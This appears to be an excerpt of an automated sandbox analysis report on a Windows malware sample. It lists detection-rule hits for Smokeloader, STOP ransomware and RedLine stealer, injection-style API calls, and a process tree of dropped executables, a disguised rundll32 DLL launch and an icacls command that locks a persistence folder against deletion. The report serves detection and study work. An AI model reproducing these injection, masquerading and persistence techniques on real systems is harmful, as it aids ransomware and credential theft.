    Source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 0000002A.00000002.617050897.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 0000001B.00000002.416891695.0000000002232000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000017.00000002.422729797.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 00000017.00000002.422861272.0000000000666000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 0000002A.00000002.587743224.000000000228A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000019.00000002.413738887.0000000002337000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 0000000F.00000002.395568327.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 0000000D.00000002.382364592.0000000002258000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 0000000B.00000002.375676925.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 0000000F.00000002.395494716.0000000000616000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 0000000B.00000002.375648108.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000010.00000002.427822773.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: Process Memory Space: A4A.exe PID: 1332, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: Process Memory Space: A4A.exe PID: 2208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: Process Memory Space: ECAC.exe PID: 6092, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: Process Memory Space: DC3D.exe PID: 3344, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401558
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,0_2_00401749
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401564
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401577
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401523
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401585
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040158C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040159A
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E1560 FreeConsole,NtDelayExecution,GetModuleFileNameW,CreateFileW,GetFileSize,RtlAllocateHeap,ReadFile,FindCloseChangeNotification,WideCharToMultiByte,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,lstrlenA,lstrlenA,lstrlenA,lstrlenA,9_2_008E1560
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E12D0 LoadLibraryA,GetProcAddress,NtUnmapViewOfSection,VirtualAlloc,VirtualAlloc,memcpy,memcpy,puts,9_2_008E12D0
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401558
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_00401749 NtMapViewOfSection,NtMapViewOfSection,11_2_00401749
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401564
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401577
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401523
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401585
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_0040158C
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_0040159A
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B02834 NtQuerySystemInformation,12_2_00007DF449B02834
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B02E88 NtOpenFile,12_2_00007DF449B02E88
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B02FA4 NtUnmapViewOfSection,VirtualAlloc,NtSetInformationFile,NtClose,12_2_00007DF449B02FA4
    Source: ECAC.exe.1.drStatic PE information: Section: .data ZLIB complexity 0.9929530716268147
    Source: DC3D.exe.1.drStatic PE information: Section: .data ZLIB complexity 0.993064821733561
    Source: 1128.exe.1.drStatic PE information: Section: Fdfgtrg ZLIB complexity 0.9983088235294117
    Source: A4A.exe.1.drStatic PE information: Section: .data ZLIB complexity 0.9929530716268147
    Source: C597.exe.1.drStatic PE information: Section: .data ZLIB complexity 0.9898694225193299
    Source: A4A.exe.18.drStatic PE information: Section: .data ZLIB complexity 0.9929530716268147
    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@66/38@109/31
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: file.exeReversingLabs: Detection: 30%
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1128.exe C:\Users\user\AppData\Local\Temp\1128.exe
    Source: C:\Users\user\AppData\Local\Temp\1128.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\rirdbih C:\Users\user\AppData\Roaming\rirdbih
    Source: C:\Users\user\AppData\Local\Temp\1128.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\vcredist_5f4680.dll",Options_RunDLL 0600cc00-00e0-0478-0ea3-ae35d8b7780b
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8EAD.exe C:\Users\user\AppData\Local\Temp\8EAD.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F207.exe C:\Users\user\AppData\Local\Temp\F207.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DE4C.exe C:\Users\user\AppData\Local\Temp\DE4C.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\42FE.exe C:\Users\user\AppData\Local\Temp\42FE.exe
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\352F.exe C:\Users\user\AppData\Local\Temp\352F.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9760.exe C:\Users\user\AppData\Local\Temp\9760.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\849F.exe C:\Users\user\AppData\Local\Temp\849F.exe
    Source: C:\Users\user\AppData\Local\Temp\DE4C.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 520
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3960 -ip 3960
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exe
    Source: C:\Users\user\AppData\Local\Temp\9760.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 520
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess created: C:\Users\user\AppData\Local\Temp\ECAC.exe C:\Users\user\AppData\Local\Temp\ECAC.exe
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess created: C:\Users\user\AppData\Local\Temp\DC3D.exe C:\Users\user\AppData\Local\Temp\DC3D.exe
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe --Task
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess created: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe "C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe"
    Source: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe" --AutoStart
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1128.exe C:\Users\user\AppData\Local\Temp\1128.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A4A.exe C:\Users\user\AppData\Local\Temp\A4A.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8EAD.exe C:\Users\user\AppData\Local\Temp\8EAD.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F207.exe C:\Users\user\AppData\Local\Temp\F207.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DE4C.exe C:\Users\user\AppData\Local\Temp\DE4C.exeJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\42FE.exe C:\Users\user\AppData\Local\Temp\42FE.exeJump to behavior
